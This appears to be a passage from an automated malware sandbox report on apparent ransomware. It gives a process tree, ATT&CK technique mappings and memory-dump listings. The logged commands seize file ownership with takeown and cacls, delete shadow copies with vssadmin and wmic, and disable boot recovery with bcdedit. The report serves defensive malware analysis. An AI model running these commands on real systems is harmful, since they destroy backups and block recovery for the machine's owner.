- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:1236
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Modifies file permissions
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1848
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:708
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:1236
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1644
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Modifies file permissions
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      PID:836
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:1848
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    - Modifies file permissions
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:1644
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1644
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:1528

C:\Windows\system32\taskeng.exe
taskeng.exe {A2533500-2378-4B18-BBA9-52548463251F} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
1⤵
PID:936
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\BtGVQMhR.bat"
  2⤵
  PID:708
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1772
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:840
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1604

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:676

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1628-62-0x0000000002500000-0x000000000314A000-memory.dmp

Filesize
12.3MB

Download
memory/1628-63-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/1628-61-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/1628-64-0x0000000002500000-0x000000000314A000-memory.dmp

Filesize
12.3MB

Download
memory/1652-54-0x0000000075811000-0x0000000075813000-memory.dmp

Filesize
8KB

Download